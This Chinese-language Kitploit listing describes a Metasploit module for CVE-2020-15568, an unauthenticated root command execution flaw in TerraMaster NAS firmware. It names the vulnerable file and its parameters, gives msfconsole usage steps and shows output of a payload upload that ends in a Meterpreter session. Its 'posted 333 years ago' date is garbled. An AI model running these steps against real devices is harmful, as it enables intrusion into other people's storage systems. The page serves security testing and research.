Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
TerraMaster-TOS-CVE-2020-15568 — CVE-2020-15568 Metasploit 模块的仓库 | Kitploit
工具/GitHubGitHub/divinepwner/terramaster-tos-cve-2020-15568
漏洞利用框架漏洞分析Web应用程序漏洞利用渗透测试命令与控制远程访问工具
GitHubdivinepwner/terramaster-tos-cve-2020-15568

TerraMaster-TOS-CVE-2020-15568

CVE-2020-15568 Metasploit 模块的仓库

查看仓库
333年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

TerraMaster TOS CVE-2020-15568

CVE-2020-15568 Metasploit 模块仓库

受影响应用

描述

文件 include/exportUser.php 中存在一个动态类方法调用漏洞,可在 TerraMaster 设备上以 root 权限执行远程命令。 该漏洞文件需要提供几个 HTTP GET 参数,才能到达方法调用并利用此漏洞。在第一行,应用包含了 app.php,它会自动加载 TOS 软件的相关核心类。 应用根据 GET 参数 type 的值来决定操作。如果 type 变量的值不是 1 或 2,则可能到达易受攻击的代码。 查看 exportUser.php 的源代码,应用要求提供 HTTP GET 参数 cla(class 的简写)、func 和 opt。

在审查其他文件时也发现,可以利用 TOS 软件中已有的类来利用此问题。 位于 include/class/application.class.php 的 PHP 类是在运行 TOS 软件的设备上执行命令的最佳候选。 由于 没有身份验证控制,未经身份验证的攻击者有可能实现代码执行。

exportUser.php

验证步骤

  1. 搭建运行 TOS 4.1.24 或更低版本的 TerraMaster NAS
  2. 启动 msfconsole
  3. 执行:use exploit/multi/http/terramaster_command_exec
  4. 执行:set rhost 192.168.1.27
  5. 执行:check
root@kitploit:~
[+] 192.168.1.27:80 - 目标存在漏洞。

目标

root@kitploit:~
Exploit targets:
   Id  Name
   --  ----
   0   Auto

场景

root@kitploit:~
msf5 > use exploit/multi/http/terra_master_command_exec 
msf5 exploit(exploit/multi/http/terramaster_command_exec) > set rhost 192.168.1.27
rhost => 192.168.1.27
msf5 exploit(multi/http/terramaster_command_exec) > run
[+] Payload uploaded to /logs/FJETBHLL/.vatw.php
[+] Payload successfully triggered !
[*] Started bind TCP handler against 192.168.1.27:9090
[*] Sending stage (38288 bytes) to 192.168.1.27
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 192.168.1.27:9090) at 2020-07-23 09:49:34 +0300
meterpreter >```
下载工具